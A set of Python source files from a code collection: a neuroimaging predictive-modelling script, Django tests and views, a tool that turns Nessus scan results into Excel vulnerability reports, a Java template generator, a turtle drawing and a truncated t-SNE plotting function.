sample.\n if args.model == \"SVR\":\n dict_rmse = {} #For final RMSE\n dict_behav_pred = {} #For final prediction\n\n train_sum_final_scaled = {} #To store the scaled variables prior to prediction\n test_sum_final_scaled = {} \n behav_scaled = {} \n\n c_value_final = {} #Storing the hyper parameters for each type of run\n g_value_final = {}\n ep_value_final = {}\n\n #Looping over needed parameters, we scale the sums to use for SVR and we select the right\n # svr parameters.\n for type_e in ['pos', 'neg']:\n for type_s in ['norm', 'rand']:\n train_sum_final_scaled[f'{type_s}_{type_e}'], \n test_sum_final_scaled[f'{type_s}_{type_e}'] = _svr_scaler(\n train_sum_final[f'{type_s}_{type_e}'], test_sum_final[f'{type_s}_{type_e}'])\n\n if type_s == \"norm\":\n c_value_final[f'{type_s}_{type_e}'], g_value_final[f\"{type_s}_{type_e}\"],\n ep_value_final[f'{type_s}_{type_e}'] = _svr_best_param_selection(\n rmse_train_final=rmse_train_final[f'{type_s}_{type_e}'], type_m=f'{type_e}'\n )\n\n #Last thing needed to scale is the behavior\n behav_scaled['train'], behav_scaled['test'] = _svr_scaler(\n behav_train, behav_test)\n\n #Next, we fit and predict our behavior using SVR\n for type_p in ['train', 'test']: #Type of prediction to do\n for type_e in ['pos', 'neg']: #Type of edge association (positive/negative)\n for type_s in ['norm', 'rand']: #Type of sum (normal or randomized?)\n if type_p == \"test\":\n test_sum_tmp = test_sum_final\n elif type_p == \"train\":\n test_sum_tmp = train_sum_final\n\n dict_rmse[f'rmse_{type_s}_{type_p}_{type_e}'],\n dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}'] = _svr_fit_predict(\n train_sum_scaled=train_sum_final_scaled[f'{type_s}_{type_e}'],\n test_sum_scaled=test_sum_final_scaled[f'{type_s}_{type_e}'],\n behav_train=behav_scaled[f'train'], behav_test=behav_scaled[f'{type_p}'],\n c_value=c_value_final[f'{type_s}_{type_e}'], \n g_value=g_value_final[f\"{type_s}_{type_e}\"],\n ep_value=ep_value_final[f'{type_s}_{type_e}'], type_pred='final')\n\n if args.model == \"LM\":\n dict_rmse = {}\n dict_behav_pred = {}\n\n #We iterate over the different metrics we need to extract, and store them in dictionaries\n for type_p in ['test', 'train']:\n for type_e in ['pos', 'neg']:\n for type_s in ['rand', 'norm']:\n #To avoid having multiple calls to _lm_fit_predict, we use aliases for the\n # variables to pass. Specifically, we want the prediction in both train and\n # test set, so we just assign them to different aliases before running pred.\n if type_p == \"test\":\n test_sum_tmp = test_sum_final\n behav_test_tmp = behav_test\n elif type_p == \"train\":\n test_sum_tmp = train_sum_final\n behav_test_tmp = behav_train\n\n dict_rmse[f'rmse_{type_s}_{type_p}_{type_e}'], dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}'] = _lm_fit_predict(\n train_sum=train_sum_final[f'{type_s}_{type_e}'],\n test_sum=test_sum_tmp[f'{type_s}_{type_e}'],\n behav_train=behav_train, behav_test=behav_test_tmp)\n\n #The CPM outputs many things:\n # 1) The actual behavior observed for the training and testing sample\n # 2) The predicted values during the cross-validation\n # 3) The actual behavior observed in the leftout test set\n # 4) The RMSE of the prediction in the leftout test set\n # 5) The arrays of predicted behavior for participants in the leftout test set\n\n return behav_train, behav_pred_train, behav_test, dict_rmse, dict_behav_pred\n\ndef cpm_prediction_measures(behav_train, behav_pred_train, behav_test, dict_behav_pred, args):\n \"\"\" Here, the idea is to compute the different prediction metrics we are interested in,\n and store that information for output.\n\n Metrics we output are:\n - For pos/neg edges\n - Cross-validation:\n - Correlation between original behavior and predicted behavior during LOOCV\n - RMSE between original behavior and predicted behavior during LOOCV\n - Leftout test set:\n - For normal and randomized FC sums\n - Correlation between test set behavior and predicted behavior (final)\n - RMSE between test set behavior and predicted behavior\n\n In total, we should have 12 different metrics\n \"\"\"\n predict_meas_valid = pd.DataFrame(columns=['model', 'type_edge', 'type_sum', 'type_samp', \n 'type_predict', 'type_meas', 'value'])\n\n #First, compute for the cross-validation\n for type_e in ['pos', 'neg']:\n for type_s in ['norm', 'rand']:\n if type_s == 'norm':\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_train),\n np.squeeze(behav_pred_train[f'{type_s}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_train),\n y_pred=np.squeeze(behav_pred_train[f'{type_s}_{type_e}']),\n squared=False)\n\n tmp_df = pd.DataFrame(data={'model':[args.model, args.model, args.model], \n 'type_edge':[type_e, type_e, type_e],\n 'type_sum':[type_s, type_s, type_s], \n 'type_samp':['cross_validation', 'cross_validation', 'cross_validation'],\n 'type_predict':['norm', 'norm', 'norm'],\n 'type_meas':['corr', 'pval', 'rmse'], \n 'value':[corr_val, p_val, rmse_val]})\n\n predict_meas_valid = pd.concat([predict_meas_valid, tmp_df], axis=0, \n ignore_index=True)\n\n #Next, compute for the test set\n for type_e in ['pos', 'neg']:\n for type_s in ['norm', 'rand']:\n for type_p in ['train', 'test']:\n if type_p == 'train':\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_train),\n np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_train),\n y_pred=np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']),\n squared=False)\n elif type_p == \"test\":\n corr_val, p_val = scipy.stats.pearsonr(np.squeeze(behav_test),\n np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']))\n rmse_val = metrics.mean_squared_error(y_true=np.squeeze(behav_test),\n y_pred=np.squeeze(dict_behav_pred[f'behav_pred_{type_s}_{type_p}_{type_e}']),\n squared=False)\n\n tmp_df = pd.DataFrame(data={\n 'model':[args.model, args.model, args.model],\n 'type_edge':[type_e, type_e, type_e],\n 'type_sum':[type_s, type_s, type_s],\n 'type_samp':['final', 'final', 'final'], \n 'type_predict':[type_p, type_p, type_p],\n 'type_meas':['corr', 'pval', 'rmse'],\n 'value':[corr_val, p_val, rmse_val]})\n\n predict_meas_valid = pd.concat([predict_meas_valid, tmp_df], axis=0, \n ignore_index=True)\n\n return predict_meas_valid\n\ndef cpm_export(predict_meas_valid, args):\n \"\"\" Simple function exporting the predicted measures\n \"\"\"\n predict_meas_valid.to_csv(f\"{args.output}/model_validation_{args.model}_{args.name}.csv\")\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"St_Onge_2022_Fingerprinting/connectome_predictive_modelling/python/cpm_python_v2.py","file_name":"cpm_python_v2.py","file_ext":"py","file_size_in_byte":32198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"278341391","text":"from django.urls import reverse\nimport pytest\n\n\n@pytest.mark.django_db\nclass TestViewsCase:\n\n def test_index_200(self, client):\n url = reverse('catalog:index')\n response = client.get(url)\n assert response.status_code == 200\n\n def test_authors(self, client):\n url = reverse('catalog:author')\n response = client.get(url)\n assert response.charset == 'utf-8'\n assert response.client == client\n assert 'catalog/author_index.html' in (t.name for t in response.templates)\n\n def test_add_book_post(self, client):\n url = reverse('catalog:addbook_url')\n response = client.post(url, {'title': 'Python CookBook', 'description': 'Lorem, ipsum dolor \\\n sit amet consectetur adipisicing elit. Ratione maxime possimus odio, \\\n aliquid in cum corporis vero vitae ullam quia amet molestiae rerum \\\n quos distinctio nemo nostrum. Culpa, fuga. Ipsam? Commodi consectetur\\\n tempora quisquam dolorem laboriosam vero eligendi eius culpa accusantium?\\\n Similique maxime culpa ad eveniet iure natus, porro nemo repudiandae \\\n praesentium sed illum, unde iste explicabo, dolores vel hic? Pariatur, \\\n quod exercitationem ipsum illum labore eius velit nobis mol'})\n assert response.status_code == 200\n\n","sub_path":"catalog/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"242213267","text":"# -*- coding: utf-8 -*-\n## @package csvdump\n# Ce module permet la gestion de fichier Excel\n\nimport csv\nimport xlwt\nimport sys\nfrom openpyxl import *\nimport openpyxl\nfrom openpyxl.styles import Font, Fill, Alignment, Color, colors\nimport nessusdump\nimport config\nfrom datetime import date\nimport os\n\n\n## Fonction search_start_line\n# @param worksheet Fichier Excel ouvert\n# @return Numero de ligne\n# Fonction permettant de trouver le debut du hacker s view\ndef search_start_line(worksheet):\n\tcurrentline = 1\n\twhile not (worksheet[\"B\"+str(currentline)].value == \"Domaines\" or worksheet[\"B\"+str(currentline)].value == \"Domain(s)\"):\n\t\tcurrentline = currentline+1\n\treturn currentline+1\n\n## Fonction dumpxlsopen\n# @param filepath Path du fichier Excel\n# @param vulnstruct Liste de structure fiche\n# @param hvstruct Liste de structure hacker s view\n# @param listcriticite Liste des criticite selectionne par l utilisateur\n# Permet la creation du fichier Excel final\ndef dumpxlsopen(filepath, vulnstruct, hvstruct, listcriticite):\n\ttemplate = load_workbook(config.readconf(\"Template\", \"template_excel\"))\n\tinterfacecount = {\"admin_infra\": 0, \"admin_web\": 0, \"api_web\": 0, \"bdd\": 0}\n\tif hvstruct != None:\n\t\tdatecount = []\n\t\ttemplate_source_sheet = template[\"Fiche Vulns MASTER\"]\n\t\thackersviewsheet = template[\"Hacker's View\"]\n\t\tline = search_start_line(hackersviewsheet)\n\t\tfor currentHv in hvstruct:\n\t\t\thackersviewsheet[\"A\"+str(line)] = currentHv.categorie\n\t\t\thackersviewsheet[\"B\"+str(line)] = currentHv.domaine\n\t\t\thackersviewsheet[\"C\"+str(line)] = currentHv.ipNew\n\t\t\thackersviewsheet[\"D\"+str(line)] = currentHv.portsNew\n\t\t\thackersviewsheet[\"E\"+str(line)] = currentHv.localisationNew\n\t\t\thackersviewsheet[\"I\"+str(line)] = currentHv.commentaire\n\t\t\tinterfacecount[\"admin_infra\"] = interfacecount[\"admin_infra\"]+currentHv.commentaire.count(\"administration infrastructure\")\n\t\t\tinterfacecount[\"admin_web\"] = interfacecount[\"admin_web\"]+currentHv.commentaire.count(\"administration Web\")\n\t\t\tinterfacecount[\"bdd\"] = interfacecount[\"bdd\"]+currentHv.commentaire.count(\"Base de donn\")\n\t\t\tif currentHv.ipOld == \"unknown\":\n\t\t\t\thackersviewsheet[\"A\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"B\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"C\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"D\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"E\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\thackersviewsheet[\"I\"+str(line)].font = Font(color=colors.RED)\n\t\t\telse:\n\t\t\t\tif currentHv.ipNew != currentHv.ipOld:\n\t\t\t\t\thackersviewsheet[\"C\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\tif currentHv.portsNew.replace(\" \", \"\") != currentHv.portsOld.replace(\" \", \"\"):\n\t\t\t\t\thackersviewsheet[\"D\"+str(line)].font = Font(color=colors.RED)\n\t\t\t\tif currentHv.localisationNew != unicode(currentHv.localisationOld).encode('utf-8'):\n\t\t\t\t\thackersviewsheet[\"E\"+str(line)].font = Font(color=colors.RED)\n\t\t\tif vulnstruct != None:\n\t\t\t\tlisthashtag = nessusdump.gethashtaglist(vulnstruct, currentHv.ipNew, listcriticite)\n\t\t\t\tif len(listhashtag) > 0:\n\t\t\t\t\thackersviewsheet[\"F\"+str(line)] = \"[oui]\"\n\t\t\t\t\thackersviewsheet[\"H\"+str(line)] = \"~\".join(listhashtag)\n\t\t\tline = line+1\n\n\tif vulnstruct != None:\n\t\tfor current in vulnstruct:\n\t\t\tif current.typevuln == \"External\":\n\t\t\t\texcelfiche(filepath, template, vulnstruct, listcriticite, \"External\", interfacecount)\n\t\t\t\tbreak\n\t\ttemplate = load_workbook(config.readconf(\"Template\", \"template_excel\"))\n\t\tfor current in vulnstruct:\n\t\t\tif current.typevuln == \"Internal\":\n\t\t\t\texcelfiche(filepath, template, vulnstruct, listcriticite, \"Internal\", interfacecount = None)\n\t\t\t\tbreak\n\telse:\n\t\tgraph_sheet = template[\"Graph\"]\n\t\tgraph_sheet[\"C17\"] = interfacecount[\"admin_web\"]\n\t\tgraph_sheet[\"C18\"] = interfacecount[\"admin_infra\"]\n\t\tgraph_sheet[\"C19\"] = interfacecount[\"api_web\"]\n\t\tgraph_sheet[\"C20\"] = interfacecount[\"bdd\"]\n\t\ttemplate.save(filepath)\n\tif vulnstruct != None:\n\t\tos.remove(filepath.name)\n\n\n## Fonction excelfiche\n# @param filepath Path du fichier Excel\n# @param template Template du Excel\n# @param vulnstruct Liste de structure fiche\n# @param listcriticite Liste des criticite selectionne par l utilisateur\n# @param typeF Type de la fiche External ou Internal\n# @param interfacecount Compatage des interfaces pour le HV\n# Permet la creation des fiches de vulnerabilite et la sauvegarde du fichier\ndef excelfiche(filepath, template, vulnstruct, listcriticite, typeF, interfacecount):\n\tflag = False\n\ttemplate_source_sheet = template[\"Fiche Vulns MASTER\"]\n\tvulncount = {\"Info\": 0, \"Faible\": 0, \"Moyenne\": 0, \"Haute\": 0, \"Critique\": 0}\n\tfor currentVuln in vulnstruct:\n\t\tif (listcriticite[int(currentVuln.criticite)] == 1) and (currentVuln.typevuln == typeF):\n\t\t\taddedstring=\"\"\n\t\t\tremovedstring=\"\"\n\t\t\tenvstring = \"\"\n\t\t\tflag = True\t\t\n\t\t\tvulnsheet = template.create_sheet(currentVuln.hashtag)\n\t\t\tinstance = openpyxl.worksheet.copier.WorksheetCopy(template_source_sheet, vulnsheet)\n\t\t\topenpyxl.worksheet.copier.WorksheetCopy.copy_worksheet(instance)\n\t\t\tvulnsheet[\"A2\"] = currentVuln.hashtag\n\t\t\tvulnsheet[\"B2\"] = currentVuln.name\n\t\t\tvulnsheet[\"C2\"] = convert_criticite(str(currentVuln.criticite))\n\t\t\tvulncount[convert_criticite(str(currentVuln.criticite))] = vulncount[convert_criticite(str(currentVuln.criticite))]+1\n\t\t\tcolour = get_criticite_color(convert_criticite(str(currentVuln.criticite)))\n\t\t\tvulnsheet[\"C2\"].fill = openpyxl.styles.PatternFill(start_color= colour, end_color= colour, fill_type=\"solid\")\n\t\t\tenvstring = nessusdump.getstringip(currentVuln.environnement+currentVuln.environnementadded, True, listcriticite[7])\n\t\t\tif envstring == \"\":\n\t\t\t\tvulnsheet[\"A4\"] = nessusdump.getstringip(currentVuln.environnementadded, True, listcriticite[7])\n\t\t\t\tvulnsheet[\"A6\"] = currentVuln.description\n\t\t\telse:\n\t\t\t\tvulnsheet[\"A4\"] = nessusdump.getstringip(currentVuln.environnement+currentVuln.environnementadded, True, listcriticite[7])\n\t\t\t\tif len(currentVuln.environnementadded) > 0:\n\t\t\t\t\tif currentVuln.environnement != currentVuln.environnementadded:\n\t\t\t\t\t\taddedstring = \"Ajout :\\n\"+nessusdump.getstringip(currentVuln.environnementadded, True, listcriticite[7])+\"\\n\\n\"\n\t\t\t\tif len(currentVuln.environnementremoved) > 0:\n\t\t\t\t\tremovedstring = \"Retrait :\\n\"+nessusdump.getstringip(currentVuln.environnementremoved, True, listcriticite[7])+\"\\n\\n\"\n\t\t\t\tvulnsheet[\"A6\"] = addedstring+removedstring+currentVuln.description\n\t\t\tvulnsheet[\"A8\"] = currentVuln.impact\n\t\t\tvulnsheet[\"A10\"] = currentVuln.recommendation\n\t\t\tvulnsheet[\"A12\"] = currentVuln.reference\n\t\t\tvulnsheet.sheet_properties.tabColor = colour\n\tif not flag:\n\t\tif typeF == \"External\":\n\t\t\ttemplate.save(filepath.name.split('.xlsx')[0]+\"_\"+typeF+\".xlsx\")\n\t\treturn\n\tgraph_sheet = template[\"Graph\"]\n\tif typeF == \"External\":\n\t\tgraph_sheet[\"C17\"] = interfacecount[\"admin_web\"]\n\t\tgraph_sheet[\"C18\"] = interfacecount[\"admin_infra\"]\n\t\tgraph_sheet[\"C19\"] = interfacecount[\"api_web\"]\n\t\tgraph_sheet[\"C20\"] = interfacecount[\"bdd\"]\n\n\tgraph_sheet[\"C28\"] = vulncount[\"Critique\"]\n\tgraph_sheet[\"C29\"] = vulncount[\"Haute\"]\n\tgraph_sheet[\"C30\"] = vulncount[\"Moyenne\"]\n\tgraph_sheet[\"C31\"] = vulncount[\"Faible\"]\n\tif vulnstruct != None:\n\t\tgraph_sheet[\"B35\"] = u\"Moyenne jours patch pour les vulnérabilités critique et \\xE9lev\\xE9e\"\n\t\tgraph_sheet [\"C35\"] = datepatchaverage(vulnstruct)\n\tdel template[\"Fiche Vulns MASTER\"]\n\tif typeF == \"Internal\":\n\t\tdel template[\"Hacker's View\"]\n\ttemplate.save(filepath.name.split('.xlsx')[0]+\"_\"+typeF+\".xlsx\")\n\n## Fonction getinfoexcel\n# @param path Path du fichier Excel\n# @return Liste de structure fiche\n# Fonction permettant de retrouver les informations sur les vulnerabilites dans un Excel\ndef getinfoexcel(path):\n\tfileexcel = load_workbook(path)\n\tlistvuln = []\n\t\n\tfor currentsheet in fileexcel.get_sheet_names():\n\t\tif \"V-\" not in currentsheet:\n\t\t\tcontinue\n\t\tstartarray = 1\n\t\tws = fileexcel.get_sheet_by_name(name = currentsheet)\n\t\twhile True:\n\t\t\ttest = \"A\"+str(startarray)\n\t\t\tif ws[test].value == \"#\":\n\t\t\t\tstartarray = startarray+1\n\t\t\t\tbreak\n\t\t\tstartarray = startarray+1\n\t\tmyVuln = nessusdump.fichevuln()\n\t\tmyVuln.hashtag = ws[\"A\"+str(startarray)].value\n\t\tmyVuln.name = ws[\"B\"+str(startarray)].value\n\t\tmyVuln.criticite = ws[\"C\"+str(startarray)].value\n\t\tposition = 0\n\t\tfor currentdetail in ws[\"A\"+str(startarray+1)].value.split(\"\\n\"):\n\t\t\tif currentdetail==\"\":\n\t\t\t\tcontinue\n\t\t\tif checkkeywords(currentdetail):\n\t\t\t\tposition = checkkeywords(currentdetail)\n\t\t\telse:\n\t\t\t\tif position == 1:\n\t\t\t\t\tif myVuln.environnement == \"\": \n\t\t\t\t\t\tmyVuln.environnement = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.environnement = myVuln.environnement+', '+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 2:\n\t\t\t\t\tif myVuln.description == \"\": \n\t\t\t\t\t\tmyVuln.description = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.description = myVuln.description+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 3:\n\t\t\t\t\tif myVuln.impact == \"\": \n\t\t\t\t\t\tmyVuln.impact = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.impact = myVuln.impact+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 4:\n\t\t\t\t\tif myVuln.recommendation == \"\": \n\t\t\t\t\t\tmyVuln.recommendation = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.recommendation = myVuln.recommendation+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\telif position == 5:\n\t\t\t\t\tif myVuln.reference == \"\": \n\t\t\t\t\t\tmyVuln.reference = currentdetail.replace(u\"\\u2022\", u\"\")\n\t\t\t\t\telse :\n\t\t\t\t\t\tmyVuln.reference = myVuln.reference+'\\n'+currentdetail.replace(u\"\\u2022\", u\"\")\n\t\tlistvuln.append(myVuln)\n\treturn listvuln\n\n## Fonction checkkeywords\n# @param currentline Ligne courante dans le fichier Excel\n# @return Vrai ou Faux\n# Fonction permettant de savoir si l un des mots est present dans la ligne courante\ndef checkkeywords(currentline):\n\tkeywords = [\"Environnement(s) vuln\", \"Description\", \"Impact potentiel\", \"Recommandation(s)\", \"rence(s)\"]\n\tindex = 0\n\tfor currentwords in keywords:\n\t\tif currentwords in currentline:\n\t\t\tindex = index+1\n\t\t\treturn index\n\t\tindex = index+1\n\treturn False\n\n## Fonction checkstringsize\n# @param wantcheck Chaine a verifier\n# @param Taille de l ancienne chaine\n# @return La plus grande taille\n# Fonction permettant de savoir quelle chaine de caractere est la plus grande\ndef checkstringsize(wantcheck, previoussize):\n\tif previoussize < wantcheck.count(''):\n\t\treturn int(wantcheck.count(''))\n\treturn previoussize\n\n## Fonction convert_criticite\n# @param criticite Numero de la criticite\n# @return Valeur de la criticite en mot\n# Fonction permettant de convertir un numero de criticite en mot\ndef convert_criticite(criticite):\n\tif criticite == '0':\n\t\treturn \"Info\"\n\telif criticite == '1':\n\t\treturn \"Faible\"\n\telif criticite == '2':\n\t\treturn \"Moyenne\"\n\telif criticite == '3':\n\t\treturn \"Haute\"\n\telse:\n\t\treturn \"Critique\"\n\n## Fonction convert_string_criticite\n# @param criticite String de la criticite\n# @return Valeur de la criticite en chiffre\n# Fonction permettant de convertir une string de criticite en chiffre\ndef convert_string_criticite(criticite):\n\tif criticite == \"Info\":\n\t\treturn 0\n\telif criticite == \"Faible\":\n\t\treturn 1\n\telif criticite == \"Moyenne\":\n\t\treturn 2\n\telif criticite == \"Haute\":\n\t\treturn 3\n\telse:\n\t\treturn 4\n\n## Fonction get_criticite_color\n# @param criticite Nom de la criticite\n# @return Couleur en code HEX\n# Fonction permettant de connaitre la couleur associee a une criticite\ndef get_criticite_color(criticite):\n\tif criticite == \"Info\":\n\t\treturn \"0000cd\"\n\telif criticite == \"Faible\":\n\t\treturn \"6ead00\"\n\telif criticite == \"Moyenne\":\n\t\treturn \"e9dc00\"\n\telif criticite == \"Haute\":\n\t\treturn \"ff0000\"\n\telse:\n\t\treturn \"a40000\"\n\n## Fonction getlineIP\n# @param ip Ips recherchees\n# @param listStructHost List des hosts\n# @return Liste de lignes\n# Fonction permettant de recuperer la line des IP pour le fichier excel\ndef getlineIP(ip, listStructHost):\n\tlistline = []\n\tcompt = 0\n\tfor currentHost in listStructHost:\n\t\tif currentHost.ipAdress == ip:\n\t\t\tlistline.append(compt+START_LINE_TEMPLATE)\n\t\tcompt = compt+1\n\treturn listline\n\n\n## Fonction datepatchaverage\n# @param datelist Liste de vuln\n# @return Nombre de jour moyen\n# Fonction permettant de connaître l age moyen des patch pour les vulnerabilites critique et elevee\ndef datepatchaverage(vulnlist):\n\taverage = 0\n\tcount = 0\n\tfor current in vulnlist:\n\t\tif int(current.criticite) > 2:\n\t\t\tfor currentenv in current.environnement:\n\t\t\t\tfor currentplugin in currentenv.pluginid:\n\t\t\t\t\tcurrentdate = currentplugin.split(':')[3]\n\t\t\t\t\tif currentdate != \"00/00/0000\":\n\t\t\t\t\t\tcutcut = currentdate.split('/')\n\t\t\t\t\t\tdelta = date.today() - date(int(cutcut[0]), int(cutcut[1]), int(cutcut[2]))\n\t\t\t\t\t\taverage = average + int(str(delta).split(',')[0].split(' ')[0])\n\t\t\t\t\t\tcount = count+1\n\ttry:\n\t\treturn (average / count)\n\texcept ZeroDivisionError:\n\t\treturn 0\n\n\n## Fonction dumpipfqdn\n# @param filepath Chemin du fichier de destination\n# @param vulnlist Liste de vulnerabilite Nessus\n# Fonction permettant de sortir un fichier Excel permettant de connaitre la correspondance IP / FQDN\ndef dumpipfqdn(filepath, vulnlist):\n\tclass ipfqdn(object):\n\t\tdef __init__(self, iip, ffqdn):\n\t\t\tself._ip = iip\n\t\t\tself._fqdn = ffqdn\n\t\t@property\n\t\tdef ip(self):\n\t\t\treturn self._ip\n\t\t@property\n\t\tdef fqdn(self):\n\t\t\treturn self._fqdn\t\t\n\tlistipfqdn = []\n\tfor current in vulnlist:\n\t\tfor currentenv in current.environnement:\n\t\t\tif nessusdump.checkippresent(listipfqdn, currentenv.ip) == -1:\n\t\t\t\tnewipfqdn = ipfqdn(currentenv.ip, currentenv.fqdn)\n\t\t\t\tlistipfqdn.append(newipfqdn)\n\twb = Workbook()\n\tws = wb.active\n\tws.title = \"IP FQDN\"\n\tcount = 2\n\tws[\"A1\"] = \"IP\"\n\tws[\"B1\"] = \"FQDN\"\n\tfor current in listipfqdn:\n\t\tws[\"A\"+str(count)] = current.ip\n\t\tws[\"B\"+str(count)] = current.fqdn\n\t\tcount+=1\n\twb.save(filename = filepath)\n\n","sub_path":"csvdump.py","file_name":"csvdump.py","file_ext":"py","file_size_in_byte":13699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"45145688","text":"import shutil,os\nclass GenerationMain:\n listStr = [\"Controller\",\"Service\",\"Mapper\",\"Dao\",\"ServiceImpl\",\"Util\",\"Fegin\"]\n def __init__(self,className,package = ''):\n self.className = className\n self.package = package\n self.prefixU = className\n\n @property\n def prefixU(self):\n return self._prefixU\n @property\n def prefixL(self):\n return self._prefixL\n\n @prefixU.setter\n def prefixU(self,className):\n for endStr in GenerationMain.listStr:\n if(className.endswith(endStr)):\n self._prefixU = className[0:len(className)-len(endStr)]\n self._prefixL = self._prefixU[0].lower()+self._prefixU[1:len(self._prefixU)]\n break\n\n def generate(self):\n self.cleanOut()\n contents = self.getContents(True)\n contents = self.handleContents(contents)\n self.writeFile(contents,self.className)\n contents = self.getContents(False)\n contents = self.handleContents(contents)\n self.writeFile(contents,self.className+\"Test\")\n print(\"ok\")\n\n def writeFile(self,contents,fileName):\n with open(f'out/{fileName}.java','w',encoding='UTF-8') as file_object:\n file_object.write(contents)\n\n def handleContents(self,contents):\n contents = contents.replace(\"{prefixU}\",self.prefixU)\n contents = contents.replace(\"{prefixL}\",self.prefixL)\n contents = contents.replace(\"{package}\",self.package)\n contents = contents.replace(\"{className}\",self.className)\n contents = contents.replace(\"{classNameL}\",self.className[0].lower()+self.className[1:len(self.className)])\n return contents\n\n def getContents(self,test):\n if(self.className.endswith(\"Controller\")):\n if(test):\n fileName = 'controller_template'\n else:\n fileName = 'controller_test_template'\n else:\n if(test):\n fileName = 'other_template'\n else:\n fileName = 'other_test_template'\n with open(fileName,encoding='UTF-8') as file_object:\n contents = file_object.read()\n return contents\n\n def cleanOut(self):\n try:\n os.mkdir(\"out\")\n except FileExistsError:\n pass\n shutil.rmtree(\"out\")\n os.mkdir(\"out\")\n\nif __name__ == '__main__':\n m = GenerationMain(\"TestController\",\"com.hcfc.accounting.service\")\n m.generate()\n","sub_path":"python/generate_code.py","file_name":"generate_code.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"47036300","text":"#circleSpiral.py\nimport turtle\nt = turtle.Pen()\nt.speed(0)\ncircles = int(turtle.numinput(\"number of circles\",\"how many circles would you like me to draw?\",6))\nfor x in range(circles):\n t.circle(80)\n t.left(360/circles)\n t.right(x)\n \n","sub_path":"test circle Spiral.py","file_name":"test circle Spiral.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"448795352","text":"import logging\n\nfrom datetime import datetime\nfrom collections import defaultdict\n\nfrom application.models import AdultInHome\nfrom application.utils import get_id\nfrom application.views.PITH_views.base_views.PITH_template_view import PITHTemplateView\nfrom application.business_logic import find_dbs_status, DBSStatus\n\n\n# Initiate logging\nlog = logging.getLogger('')\n\n\nclass PITHDBSPostOrApplyView(PITHTemplateView):\n\n template_name = 'PITH_templates/PITH_DBS_post_or_apply.html'\n success_url = 'PITH-Children-Check-View'\n\n def get_context_data(self, **kwargs):\n\n application_id = get_id(self.request)\n\n adult_lists = defaultdict(list)\n\n for adult, dbs_status in self.get_adults_requiring_dbs_action(application_id):\n\n adult_lists['{}_list'.format(dbs_status.name.lower())].append(adult)\n\n kwargs.update(adult_lists)\n\n return super().get_context_data(**kwargs)\n\n def get_adults_requiring_dbs_action(self, application_id):\n \"\"\"\n Gets the list of adults in the home associated with this application that need to\n take further action to complete their DBS check\n :param application_id:\n :return: List of 2-tuples containing the adult model and their DBSStatus\n \"\"\"\n\n adults = AdultInHome.objects.filter(application_id=application_id)\n filtered = []\n for adult in adults:\n\n dbs_status = find_dbs_status(adult, adult)\n\n if dbs_status in (DBSStatus.NEED_APPLY_FOR_NEW,\n DBSStatus.NEED_UPDATE_SERVICE_SIGN_UP,\n DBSStatus.NEED_UPDATE_SERVICE_CHECK):\n filtered.append((adult, dbs_status))\n\n return filtered\n","sub_path":"application/views/PITH_views/PITH_DBS_post_or_apply.py","file_name":"PITH_DBS_post_or_apply.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621109034","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nmatplotlib.use('TkAgg')\nfrom sklearn.manifold import TSNE\n\n\n\ndef plot_embedding(data, label, title):\n\n fig = plt.figure()\n ax = plt.subplot(111)\n type1_x = []\n type1_y = []\n type2_x = []\n type2_y = []\n type3_x = []\n type3_y = []\n type4_x = []\n type4_y = []\n type5_x = []\n type5_y = []\n type6_x = []\n type6_y = []\n type7_x = []\n type7_y = []\n type8_x = []\n type8_y = []\n type9_x = []\n type9_y = []\n type10_x = []\n type10_y = []\n\n\n for i in range(data.shape[0]):\n if label[i] == 0:\n type1_x.append(data[i][0])\n type1_y.append(data[i][1])\n if label[i] == 1:\n type2_x.append(data[i][0])\n type2_y.append(data[i][1])\n if label[i] == 2:\n type3_x.append(data[i][0])\n type3_y.append(data[i][1])\n if label[i] == 3:\n type4_x.append(data[i][0])\n type4_y.append(data[i][1])\n if label[i] == 4:\n type5_x.append(data[i][0])\n type5_y.append(data[i][1])\n if label[i] == 5:\n 